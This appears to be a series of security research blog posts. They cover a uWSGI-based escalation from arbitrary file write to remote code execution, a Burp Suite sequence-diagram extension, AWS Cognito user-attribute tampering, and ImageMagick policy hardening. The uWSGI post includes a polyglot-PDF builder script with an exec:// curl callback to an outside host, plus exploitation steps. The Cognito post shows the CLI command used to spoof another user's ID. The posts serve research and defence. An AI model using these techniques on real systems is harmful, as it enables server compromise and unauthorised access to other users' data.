A New Vector For “Dirty” Arbitrary File Write to RCE


Arbitrary file write (AFW) vulnerabilities in web application uploads can be a powerful tool for an attacker, potentially allowing them to escalate their privileges and even achieve remote code execution (RCE) on the server. However, the specific tactics that can be used to achieve this escalation often depend on the specific scenario faced by the attacker. In the wild, there can be several scenarios that an attacker may encounter when attempting to escalate from AFW to RCE in web applications. These can generically be categorized as:

  • Control of the full file path or of the file name only: In this scenario, the attacker has the ability to control the full file path or the name of the uploaded file, but not its contents. Depending on the permissions applied to the target directory and on the target application, the impact may vary from Denial of Service to interfering with the application logic to bypass potential security-sensitive features.
  • Control of the file contents only: an attacker has control over the contents of the uploaded file but not over the file path. The impact can vary greatly in this case, due to numerous factors.
  • Full Arbitrary File Write: an attacker has control over both of the above. This often results in RCE using various methods.

A plethora of tactics have been used in the past to achieve RCE through AFW in moderately hardened environments (in applications running as unprivileged users):

  • Overwriting or adding files that will be processed by the application server:
    • Configuration files (e.g., .htaccess, .config, web.config, httpd.conf, __init__.py and .xml)
    • Source files being served from the root of the application (e.g., .php, .asp, .jsp files)
    • Temp files
    • Secrets or environmental files (e.g., venv)
    • Serialized session files
  • Manipulating procfs to execute arbitrary code
  • Overwriting or adding files used or invoked by the OS, or by other daemons in the system:
    • Crontab routines
    • Bash scripts
    • .bashrc, .bash-profile and .profile
    • authorized_keys and authorized_keys2 - to gain SSH access
    • Abusing supervisors’ eager reloading of assets

It’s important to note that only a very small set of these tactics can be used in cases of partial control over the file contents in web applications (e.g., PHP, ASP or temp files). The specific methods used will depend on the specific application and server configuration, so it is important to understand the unique vulnerabilities and attack vectors that are present in the victims’ systems.

The following write-up illustrates a real-world chain of distinct vulnerabilities to obtain arbitrary command execution during one of our engagements, which resulted in the discovery of a new method. This is particularly useful in case an attacker has only partial control over the injected file contents (“dirty write”) or when server-side transformations are performed on its contents.

An example of a “dirty” arbitrary file write

In our scenario, the application had a vulnerable endpoint, through which, an attacker was able to perform a Path Traversal and write/delete files via a PDF export feature. Its associated function was responsible for:

  1. Reading an existing PDF template file and its stream
  2. Combining the PDF template and the new attacker-provided contents
  3. Saving the results in a PDF file named by the attacker

The attack was limited since it could only impact the files with the correct permissions for the application user, with all of the application files being read-only. While an attacker could already use the vulnerability to first delete the logs or on-file databases, no higher impact was possible at first glance. By looking at the directory, the following file was also available:

    drwxrwxr-x  6 root   root     4096 Nov 18 13:48 .
    -rw-rw-r-- 1 webuser webuser 373 Nov 18 13:46 /app/console/uwsgi-sockets.ini

uWSGI Lax Parsing of Configuration Files

The victim’s application was deployed through a uWSGI application server (v2.0.15) fronting the Flask-based application, acting as a process manager and monitor. uWSGI can be configured using several different methods, supporting loading configuration files via simple disk files (.ini). The uWSGI native function responsible for parsing these files is defined in core/ini.c:128 . The configuration file is initially read in full into memory and scanned to locate the string indicating the start of a valid uWSGI configuration (“[uwsgi]”):

	while (len) {
		ini_line = ini_get_line(ini, len);
		if (ini_line == NULL) {

		// skip empty line
		key = ini_lstrip(ini);
		if (key[0] != 0) {
			if (key[0] == '[') {
				section = key + 1;
				section[strlen(section) - 1] = 0;
			else if (key[0] == ';' || key[0] == '#') {
				// this is a comment
			else {
				// val is always valid, but (obviously) can be ignored
				val = ini_get_key(key);

				if (!strcmp(section, section_asked)) {
					got_section = 1;
					val = ini_lstrip(val);
					add_exported_option((char *) key, val, 0);

		len -= (ini_line - ini);
		ini += (ini_line - ini);


More importantly, uWSGI configuration files can also include “magic” variables, placeholders and operators defined with a precise syntax. The ‘@’ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including “exec” - useful to read from a process’s standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is parsed:

    ; read from a symbol
    foo = @(sym://uwsgi_funny_function)
    ; read from binary appended data
    bar = @(data://0)
    ; read from http
    test = @(http://doyensec.com/hello)
    ; read from a file descriptor
    content = @(fd://3)
    ; read from a process stdout
    body = @(exec://whoami)
    ; call a function returning a char *
    characters = @(call://uwsgi_func)

uWSGI Auto Reload Configuration

While abusing the above .ini files is a good vector, an attacker would still need a way to reload it (such as triggering a restart of the service via a second DoS bug or waiting the server to restart). In order to help with this, a standard uWSGI deployment configuration flag could ease the exploitation of the bug. In certain cases, the uWSGI configuration can specify a py-auto-reload development option, for which the Python modules are monitored within a user-determined time span (3 seconds in this case), specified as an argument. If a change is detected, it will trigger a reload, e.g.:

    home = /app
    uid = webapp
    gid = webapp
    chdir = /app/console
    socket =
    wsgi-file = /app/console/uwsgi-sockets.py
    gevent = 500
    logto = /var/log/uwsgi/%n.log
    harakiri = 30
    vacuum = True
    py-auto-reload = 3
    callable = app
    pidfile = /var/run/uwsgi-sockets-console.pid
    log-maxsize = 100000000
    log-backupname = /var/log/uwsgi/uwsgi-sockets.log.bak

In this scenario, directly writing malicious Python code inside the PDF won’t work, since the Python interpreter will fail when encountering the PDF’s binary data. On the other hand, overwriting a .py file with any data will trigger the uWSGI configuration file to be reloaded.

Putting it all together

In our PDF-exporting scenario, we had to craft a polymorphic, syntactically valid PDF file containing our valid multi-lined .ini configuration file. The .ini payload had to be kept during the merging with the PDF template. We were able to embed the multiline .ini payload inside the EXIF metadata of an image included in the PDF. To build this polyglot file we used the following script:

    from fpdf import FPDF
    from exiftool import ExifToolHelper

    with ExifToolHelper() as et:
            tags={"model": "
foo = @(exec://curl http://collaborator-unique-host.oastify.com)
            params=["-E", "-overwrite_original"]

    class MyFPDF(FPDF):

    pdf = MyFPDF()

    pdf.output('payload.pdf', 'F')

This metadata will be part of the file written on the server. In our exploitation, the eager loading of uWSGI picked up the new configuration and executed our curl payload. The payload can be tested locally with the following command:

    uwsgi --ini payload.pdf

Let’s exploit it on the web server with the following steps:

  1. Upload payload.pdf into /app/console/uwsgi-sockets.ini
  2. Wait for server to restart or force the uWSGI reload by overwriting any .py
  3. Verify the callback made by curl on Burp collaborator


As highlighted in this article, we introduced a new uWSGI-based technique. It comes in addition to the tactics already used in various scenarios by attackers to escalate from arbitrary file write (AFW) vulnerabilities in web application uploads to remote code execution (RCE). These techniques are constantly evolving with the server technologies, and new methods will surely be popularized in the future. This is why it is important to share the known escalation vectors with the research community. We encourage researchers to continue sharing information on known vectors, and to continue searching for new, less popular vectors.

Introducing Proxy Enriched Sequence Diagrams (PESD)

PESD Exporter is now public!

We are releasing an internal tool to speed-up testing and reporting efforts in complex functional flows. We’re excited to announce that PESD Exporter is now available on Github.


Modern web platforms design involves integrations with other applications and cloud services to add functionalities, share data and enrich the user experience. The resulting functional flows are characterized by multiple state-changing steps with complex trust boundaries and responsibility separation among the involved actors.

In such situations, web security specialists have to manually model sequence diagrams if they want to support their analysis with visualizations of the whole functionality logic.

We all know that constructing sequence diagrams by hand is tedious, error-prone, time-consuming and sometimes even impractical (dealing with more than ten messages in a single flow).

Proxy Enriched Sequence Diagrams (PESD) is our internal Burp Suite extension to visualize web traffic in a way that facilitates the analysis and reporting in scenarios with complex functional flows.

Meet The Format

A Proxy Enriched Sequence Diagram (PESD) is a specific message syntax for sequence diagram models adapted to bring enriched information about the represented HTTP traffic. The MermaidJS sequence diagram syntax is used to render the final diagram.

While classic sequence diagrams for software engineering are meant for an abstract visualization and all the information is carried by the diagram itself. PESD is designed to include granular information related to the underlying HTTP traffic being represented in the form of metadata.

The Enriched part in the format name originates from the diagram-metadata linkability. In fact, the HTTP events in the diagram are marked with flags that can be used to access the specific information from the metadata.

As an example, URL query parameters will be found in the arrow events as UrlParams expandable with a click.


Some key characteristics of the format :

  • visual-analysis, especially useful for complex application flows in multi-actor scenarios where the listed proxy-view is not suited to visualize the abstract logic
  • tester-specific syntax to facilitate the analysis and overall readability
  • parsed metadata from the web traffic to enable further automation of the analysis
  • usable for reporting purposes like documentation of current implementations or Proof Of Concept diagrams

PESD Exporter - Burp Suite Extension

The extension handles Burp Suite traffic conversion to the PESD format and offers the possibility of executing templates that will enrich the resulting exports.


Once loaded, sending items to the extension will directly result in a export with all the active settings.

Currently, two modes of operation are supported:

  • Domains as Actors - Each domain involved in the traffic is represented as an actor in the diagram. Suitable for multi-domain flows analysis


  • Endpoints as Actors - Each endpoint (path) involved in the traffic is represented as an actor in the diagram. Suitable for single-domain flows analysis


Export Capabilities

  • Expandable Metadata. Underlined flags can be clicked to show the underlying metadata from the traffic in a scrollable popover

  • Masked Randoms in URL Paths. UUIDs and pseudorandom strings recognized inside path segments are mapped to variable names <UUID_N> / <VAR_N>. The re-renderization will reshape the diagram to improve flow readability. Every occurrence with the same value maintains the same name

  • Notes. Comments from Burp Suite are converted to notes in the resulting diagram. Use <br> in Burp Suite comments to obtain multi-line notes in PESD exports

  • Save as :

    • Sequence Diagram in SVG format
    • Markdown file (MermaidJS syntax),
    • Traffic metadata in JSON format. Read about the metadata structure in the format definition page, “exports section”

Extending the diagram, syntax and metadata with Templates

PESD Exporter supports syntax and metadata extension via templates execution. Currently supported templates are:

  • OAuth2 / OpenID Connect The template matches standard OAuth2/OpenID Connect flows and adds related flags + flow frame

  • SAML SSO The template matches Single-Sign-On flows with SAML V2.0 and adds related flags + flow frame

Template matching example for SAML SP-initiated SSO with redirect POST:


The template engine is also ensuring consistency in the case of crossing flows and bad implementations. The current check prevents nested flow-frames since they cannot be found in real-case scenarios. Nested or unclosed frames inside the resulting markdown are deleted and merged to allow MermaidJS renderization.

Note: Whenever the flow-frame is not displayed during an export involving the supported frameworks, a manual review is highly recommended. This behavior should be considered as a warning that the application is using a non-standard implementation.

Do you want to contribute by writing you own templates? Follow the template implementation guide.


During Test Planning and Auditing

PESD exports allow visualizing the entirety of complex functionalities while still being able to access the core parts of its underlying logic. The role of each actor can be easily derived and used to build a test plan before diving in Burp Suite.

It can also be used to spot the differences with standard frameworks thanks to the HTTP messages syntax along with OAuth2/OpenID and SAML SSO templates.

In particular, templates enable the tester to identify uncommon implementations by matching standard flows in the resulting diagram. By doing so, custom variations can be spotted with a glance.

The following detailed examples are extracted from our testing activities:

  • SAML Response Double Spending. The SAML Response was sent two times and one of the submissions happened out of the flow frame


  • OIDC with subsequent OAuth2. In this case, CLIENT.com was the SP in the first flow with Microsoft (OIDC), then it was the IdP in the second flow (OAuth2) with the tenant subdomain.


During Reporting

The major benefit from the research output was the conjunction of the diagrams generated with PESD with the analysis of the vulnerability. The inclusion of PoC-specific exports in reports allows to describe the issue in a straightforward way.

The export enables the tester to refer to a request in the flow by specifying its ID in the diagram and link it in the description. The vulnerability description can be adapted to different testing approaches:

  • Black Box Testing - The description can refer to the interested sequence numbers in the flow along with the observed behavior and flaws;

  • White Box Testing - The description can refer directly to the endpoint’s handling function identified in the codebase. This result is particularly useful to help the reader in linking the code snippets with their position within the entire flow.

In that sense, PESD can positively affect the reporting style for vulnerabilities in complex functional flows.

The following basic example is extracted from one of our client engagements.

Report Example - Arbitrary User Access Via Unauthenticated Internal API Endpoint

An internal (Intranet) Web Application used by the super-admins allowed privileged users within the application to obtain temporary access to customers’ accounts in the web facing platform.

In order to restrict the access to the customers’ data, the support access must be granted by the tenant admin in the web-facing platform. In this way, the admins of the internal application had user access only to organizations via a valid grant.

The following sequence diagram represents the traffic intercepted during a user impersonation access in the internal application:


The handling function of the first request (1) checked the presence of an access grant for the requested user’s tenant. If there were valid grants, it returned the redirection URL for an internal API defined in AWS’s API Gateway. The API was exposed only within the internal network accessible via VPN.

The second request (3) pointed to the AWS’s API Gateway. The endpoint was handled with an AWS Lambda function taking as input the URL parameters containing : tenantId, user_id, and others. The returned output contained the authentication details for the requested impersonation session: access_token, refresh_token and user_id. It should be noted that the internal API Gateway endpoint did not enforce authentication and authorization of the caller.

In the third request (5), the authentication details obtained are submitted to the web-facing.platform.com and the session is set. After this step, the internal admin user is authenticated in the web-facing platform as the specified target user.

Within the described flow, the authentication and authorization checks (handling of request 1) were decoupled from the actual creation of the impersonated session (handling of request 3).

As a result, any employee with access to the internal network (VPN) was able to invoke the internal AWS API responsible for issuing impersonated sessions and obtain access to any user in the web facing platform. By doing so, the need of a valid super-admin access to the internal application (authentication) and a specific target-user access grant (authorization) were bypassed.

Stay tuned!

Updates are coming. We are looking forward to receiving new improvement ideas to enrich PESD even further.

Feel free to contribute with pull requests, bug reports or enhancements.

This project was made with love in the Doyensec Research island by Francesco Lacerenza . The extension was developed during his internship with 50% research time.

Tampering User Attributes In AWS Cognito User Pools


From The Previous Episode… Did you solve the CloudSecTidbit Ep. 1 IaC lab?


The challenge for the data-import CloudSecTidbit is basically reading the content of an internal bucket. The frontend web application is using the targeted bucket to store the logo of the app.

The name of the bucket is returned to the client by calling the /variable endpoint:

    type: 'GET',
    url: '/variable',
    dataType: 'json',
    success: function (data) {
        let source_internal = `https://${data}.s3.amazonaws.com/public-stuff/logo.png?${Math.random()}`;
        $(".logo_image").attr("src", source_internal);
    error: function (jqXHR, status, err) {
        alert("Error getting variable name");

The server will return something like:


So the schema should be clear now. Let’s use the data import functionality and try to leak the content of the data-internal-private S3 bucket:

Extracting data from the internal S3 bucket

Then, by visiting the Data Gallery section, you will see the keys.txt and dummy.txt objects, which are stored within the internal bucket.

Tidbit No. 2 - Tampering User Attributes In AWS Cognito User Pools

Amazon Web Services offer a complete solution to add user sign-up, sign-in, and access control to web and mobile applications: Cognito. Let’s first talk about the service in general terms.

From AWS Cognito’s welcome page:

“Using the Amazon Cognito user pools API, you can create a user pool to manage directories and users. You can authenticate a user to obtain tokens related to user identity and access policies.”

Amazon Cognito collects a user’s profile attributes into directories called pools that an application uses to handle all authentication related tasks.

Pool Types

The two main components of Amazon Cognito are:

  • User pools: Provide sign-up and sign-in options for app users along with attributes association for each user.
  • Identity pools: Provide the possibility to grant users access to other AWS services (e.g., DynamoDB or Amazon S3).

With a user pool, users can sign in to an app through Amazon Cognito, OAuth2, and SAML identity providers.

Each user has a profile that applications can access through the software development kit (SDK).

User Attributes

User attributes are pieces of information stored to characterize individual users, such as name, email address, and phone number. A new user pool has a set of default standard attributes. It is also possible to add custom attributes to satisfy custom needs.

App Clients & Authentication

An app is an entity within a user pool that has permission to call management operation APIs, such as those used for user registration, sign-in, and forgotten passwords.

In order to call the operation APIs, an app client ID and an optional client secret are needed. Multiple app integrations can be created for a single user pool, but typically, an app client corresponds to the platform of an app.

A user can be authenticated in different ways using Cognito, but the main options are:

  • Client-side authentication flow - Used in client-side apps to obtain a valid session token (JWT) directly from the pool;
  • Server-side authentication flow - Used in server-side app with the authenticated server-side API for Amazon Cognito user pools. The server-side app calls the AdminInitiateAuth API operation. This operation requires AWS credentials with permissions that include cognito-idp:AdminInitiateAuth and cognito-idp:AdminRespondToAuthChallenge. The operation returns the required authentication parameters.

In both the cases, the end-user should receive the resulting JSON Web Token.

After that first look at AWS SDK credentials, we can jump straight to the tidbit case.

Unrestricted User Attributes Write in AWS Cognito User Pool - The Third-party Users Mapping Case

For this case, we will focus on a vulnerability identified in a Web Platform that was using AWS Cognito.

The platform used Cognito to manage users and map them to their account in a third-party platform X_platform strictly interconnected with the provided service.

In particular, users were able to connect their X_platform account and allow the platform to fetch their data in X_platform for later use.

  "sub": "cf9..[REDACTED]",
  "device_key": "us-east-1_ab..[REDACTED]",
  "iss": "https://cognito-idp.us-east-1.amazonaws.com/us-east-1_..[REDACTED]",
  "client_id": "9..[REDACTED]",
  "origin_jti": "ab..[REDACTED]",
  "event_id": "d..[REDACTED]",
  "token_use": "access",
  "scope": "aws.cognito.signin.user.admin",
  "auth_time": [REDACTED],
  "exp": [REDACTED],
  "iat": [REDACTED],
  "jti": "3b..[REDACTED]",
  "username": "[REDACTED]"

In AWS Cognito, user tokens permit calls to all the User Pool APIs that can be hit using access tokens alone.

The permitted API definitions can be found here.

If the request syntax for the API call includes the parameter "AccessToken": "string", then it allows users to modify something on their own UserPool entry with the previously inspected JWT.

The above described design does not represent a vulnerability on its own, but having users able to edit their own User Attributes in the pool could lead to severe impacts if the backend is using them to apply internal platform logic.

The user associated data within the pool was fetched by using the AWS CLI:

$ aws cognito-idp get-user --region us-east-1--access-token eyJra..[REDACTED SESSION JWT]
    "Username": "[REDACTED]",
    "UserAttributes": [
            "Name": "sub",
            "Value": "cf915…[REDACTED]"
            "Name": "email_verified",
            "Value": "true"
            "Name": "name",
            "Value": "[REDACTED]"
            "Name": "custom:X_platform_user_id",
            "Value": "[REDACTED ID]"
            "Name": "email",
            "Value": "[REDACTED]"

The Simple Deduction

After finding the X_platform_user_id user pool attribute, it was clear that it was there for a specific purpose. In fact, the platform was fetching the attribute to use it as the primary key to query the associated refresh_token in an internal database.

Attempting to spoof the attribute was as simple as executing:

$ aws --region us-east-1 cognito-idp update-user-attributes --user-attributes "Name=custom:X_platform_user_id,Value=[ANOTHER REDACTED ID]" --access-token eyJra..[REDACTED SESSION JWT]

The attribute edit succeeded and the data from the other user started to flow into the attacker’s account. The platform trusted the attribute as immutable and used it to retrieve a refresh_token needed to fetch and show data from X_platform in the UI.

Point Of The Story - Default READ/WRITE Perms On User Attributes

In AWS Cognito, App Integrations (Clients) have default read/write permissions on User Attributes.

The following image shows the “Attribute read and write permissions” configuration for a new App Integration within a User Pool.

Consequently, authenticated users are able to edit their own attributes by using the access token (JWT) and AWS CLI.

In conclusion, it is very important to know about such behavior and set the permissions correctly during the pool creation. Depending on the platform logic, some attributes should be set as read-only to make them trustable by internal flows.

For cloud security auditors

While auditing cloud-driven web platforms, look for JWTs issued by AWS Cognito, then answer the following questions:

  • Which User Attributes are associated with the user pool?
  • Which ones are editable with the JWT directly via AWS CLI?
    • Among the editable ones, is the platform trusting such claims?
      • For what internal logic or functional flow?
      • How does editing affect the business logic?

For developers

Remove write permissions for every platform-critical user attribute within App Integration for the used Users Pool (AWS Cognito).

By removing it, users will not be able to perform attribute updates using their access tokens.

Updates will be possible only via admin actions such as the admin-update-user-attributes method, which requires AWS credentials.

+1 remediation tip: To avoid doing it by hand, apply the r/w config in your IaC and have the infrastructure correctly deployed. Terraform example:

resource "aws_cognito_user_pool" "my_pool" {
  name = "my_pool"


resource "aws_cognito_user_pool" "pool" {
  name = "pool"

resource "aws_cognito_user_pool_client" "client" {
  name = "client"

  user_pool_id = aws_cognito_user_pool.pool.id
  read_attributes = ["email"]
  write_attributes = ["email"]

The given Terraform example file will create a pool where the client will have only read/write permissions on the “email” attribute. In fact, if at least one attribute is specified either in the read_attributes or write_attributes lists, the default r/w policy will be ignored.

By doing so, it is possible to strictly specify the attributes with read/write permissions while implicitly denying them on the non-specified ones.

Please ensure to properly handle the email and phone number verification in Cognito context. Since they may contain unverified values, remember to apply the RequireAttributesVerifiedBeforeUpdate parameter.

Hands-On IaC Lab

As promised in the series’ introduction, we developed a Terraform (IaC) laboratory to deploy a vulnerable dummy application and play with the vulnerability: https://github.com/doyensec/cloudsec-tidbits/

Stay tuned for the next episode!


ImageMagick Security Policy Evaluator

During our audits we occasionally stumble across ImageMagick security policy configuration files (policy.xml), useful for limiting the default behavior and the resources consumed by the library. In the wild, these files often contain a plethora of recommendations cargo cultured from around the internet. This normally happens for two reasons:

  • Its options are only generally described on the online documentation page of the library, with no clear breakdown of what each security directive allowed by the policy is regulating. While the architectural complexity and the granularity of options definable by the policy are the major obstacles for a newbie, the corresponding knowledge base could be more welcoming. By default, ImageMagick comes with an unrestricted policy that must be tuned by the developers depending on their use. According to the docs, “this affords maximum utility for ImageMagick installations that run in a sandboxed environment, perhaps in a Docker instance, or behind a firewall where security risks are greatly diminished as compared to a public website.” A secure strict policy is also made available, however as noted in the past not always is well configured.
  • ImageMagick supports over 100 major file formats (not including sub-formats) types of image formats. The infamous vulnerabilities affecting the library over the years produced a number of urgent security fixes and workarounds involving the addition of policy items excluding the affected formats and features (ImageTragick in 2016, @taviso’s RCE via GhostScript in 2018, @insertScript’s shell injection via PDF password in 2020, @alexisdanizan’s in 2021).

Towards safer policies

With this in mind, we decided to study the effects of all the options accepted by ImageMagick’s security policy parser and write a tool to assist both the developers and the security teams in designing and auditing these files. Because of the number of available options and the need to explicitly deny all insecure settings, this is usually a manual task, which may not identify subtle bypasses which undermine the strength of a policy. It’s also easy to set policies that appear to work, but offer no real security benefit. The tool’s checks are based on our research aimed at helping developers to harden their policies and improve the security of their applications, to make sure policies provide a meaningful security benefit and cannot be subverted by attackers.

The tool can be found at imagemagick-secevaluator.doyensec.com/.

Allowlist vs Denylist approach

A number of seemingly secure policies can be found online, specifying a list of insecure coders similar to:

  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="EPI" />
  <policy domain="coder" rights="none" pattern="EPS" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="PDF" />
  <policy domain="coder" rights="none" pattern="PLT" />
  <policy domain="coder" rights="none" pattern="PS" />
  <policy domain="coder" rights="none" pattern="PS2" />
  <policy domain="coder" rights="none" pattern="PS3" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="XPS" />

In ImageMagick 6.9.7-7, an unlisted change was pushed. The policy parser changed behavior from disallowing the use of a coder if there was at least one none-permission rule in the policy to respecting the last matching rule in the policy for the coder. This means that it is possible to adopt an allowlist approach in modern policies, first denying all coders rights and enabling the vetted ones. A more secure policy would specify:

  <policy domain="delegate" rights="none" pattern="*" />
  <policy domain="coder" rights="none" pattern="*" />
  <policy domain="coder" rights="read | write" pattern="{GIF,JPEG,PNG,WEBP}" />

Case sensitivity

Consider the following directive:

  <policy domain="coder" rights="none" pattern="ephemeral,epi,eps,msl,mvg,pdf,plt,ps,ps2,ps3,show,text,win,xps" />

With this, conversions will still be allowed, since policy patterns are case sensitive. Coders and modules must always be upper-case in the policy (e.g. “EPS” not “eps”).

Resource limits

Denial of service in ImageMagick is quite easy to achieve. To get a fresh set of payloads it’s convenient to search “oom” or similar keywords in the recently opened issues reported on the Github repository of the library. This is an issue since an ImageMagick instance accepting potentially malicious inputs (which is often the case) will always be prone to be exploited. Because of this, the tool also reports if reasonable limits are not explicitly set by the policy.

Policy fragmentation

Once a policy is defined, it’s important to make sure that the policy file is taking effect. ImageMagick packages bundled with the distribution or installed as dependencies through multiple package managers may specify different policies that interfere with each other. A quick find on your local machine will identify multiple occurrences of policy.xml files:

$ find / -iname policy.xml

# Example output on macOS

# Example output on Ubuntu

Policies can also be configured using the -limit CLI argument, MagickCore API methods, or with environment variables.

A starter, restrictive policy

Starting from the most restrictive policy described in the official documentation, we designed a restrictive policy gathering all our observations:

<policymap xmlns="">
  <policy domain="resource" name="temporary-path" value="/mnt/magick-conversions-with-restrictive-permissions"/> <!-- the location should only be accessible to the low-privileged user running ImageMagick -->
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="resource" name="list-length" value="32"/>
  <policy domain="resource" name="width" value="8KP"/>
  <policy domain="resource" name="height" value="8KP"/>
  <policy domain="resource" name="map" value="512MiB"/>
  <policy domain="resource" name="area" value="16KP"/>
  <policy domain="resource" name="disk" value="1GiB"/>
  <policy domain="resource" name="file" value="768"/>
  <policy domain="resource" name="thread" value="2"/>
  <policy domain="resource" name="time" value="10"/>
  <policy domain="module" rights="none" pattern="*" /> 
  <policy domain="delegate" rights="none" pattern="*" />
  <policy domain="coder" rights="none" pattern="*" /> 
  <policy domain="coder" rights="write" pattern="{PNG,JPG,JPEG}" /> <!-- your restricted set of acceptable formats, set your rights needs -->
  <policy domain="filter" rights="none" pattern="*" />
  <policy domain="path" rights="none" pattern="@*"/>
  <policy domain="cache" name="memory-map" value="anonymous"/>
  <policy domain="cache" name="synchronize" value="true"/>
  <!-- <policy domain="cache" name="shared-secret" value="my-secret-passphrase" stealth="True"/> Only needed for distributed pixel cache spanning multiple servers -->
  <policy domain="system" name="shred" value="2"/>
  <policy domain="system" name="max-memory-request" value="256MiB"/>
  <policy domain="resource" name="throttle" value="1"/> <!-- Periodically yield the CPU for at least the time specified in ms -->
  <policy xmlns="" domain="system" name="precision" value="6"/>

You can verify that a security policy is active using the identify command:

identify -list policy
Path: ImageMagick/policy.xml

You can also play with the above policy using our evaluator tool while developing a tailored one.